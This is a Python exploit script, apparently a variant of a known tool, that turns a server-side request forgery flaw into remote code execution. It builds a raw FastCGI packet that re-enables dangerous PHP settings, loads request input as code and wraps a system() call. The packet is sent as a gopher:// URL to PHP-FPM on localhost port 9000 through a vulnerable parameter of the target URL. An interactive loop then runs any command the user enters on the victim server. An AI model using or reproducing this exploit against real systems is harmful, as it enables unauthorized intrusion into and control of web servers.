import urllib.parse
import requests
def main():
url = input("url: ").strip()
post_or_get = input("POST or GET: ").lower().strip() or "get"
parameter = input("parameter name: ").strip()
filename = input("filename: ").strip() or "/var/www/html/index.php"
if not (filename and url):
return print("filename and url required")
while True:
command = input("command: ")
length = len(command) + 52
char = chr(length)
data = (
"\x0f\x10SERVER_SOFTWAREgo / fcgiclient \x0b\tREMOTE_ADDR127.0.0.1\x0f\x08SERVER_PROTOCOLHTTP/1.1\x0e"
+ chr(len(str(length)))
)
data += (
"CONTENT_LENGTH"
+ str(length)
+ "\x0e\x04REQUEST_METHODPOST\tKPHP_VALUEallow_url_include = On\n"
)
data += (
"disable_functions = \nauto_prepend_file = php://input\x0f"
+ chr(len(filename))
+ "SCRIPT_FILENAME"
+ filename
+ "\r\x01DOCUMENT_ROOT/"
)
temp1 = chr(len(data) // 256)
temp2 = chr(len(data) % 256)
temp3 = chr(len(data) % 8)
end = (
str("\x00" * (len(data) % 8))
+ "\x01\x04\x00\x01\x00\x00\x00\x00\x01\x05\x00\x01\x00"
+ char
+ "\x04\x00"
)
end += (
"<?php system('"
+ command
+ "');die('-----Made-by-SpyD3r-----\n');?>\x00\x00\x00\x00"
)
start = (
"\x01\x01\x00\x01\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x01\x04\x00\x01"
+ temp1
+ temp2
+ temp3
+ "\x00"
)
payload = start + data + end
def get_payload(payload):
finalpayload = (
urllib.parse.quote(payload).replace("+", "%20").replace("%2F", "/")
)
return "gopher://127.0.0.1:9000/_" + finalpayload
if post_or_get == "post":
print(requests.post(url, data={parameter: get_payload(payload)}).text)
else:
print(requests.get(url, params={parameter: get_payload(payload)}).text)
if __name__ == "__main__":
main()
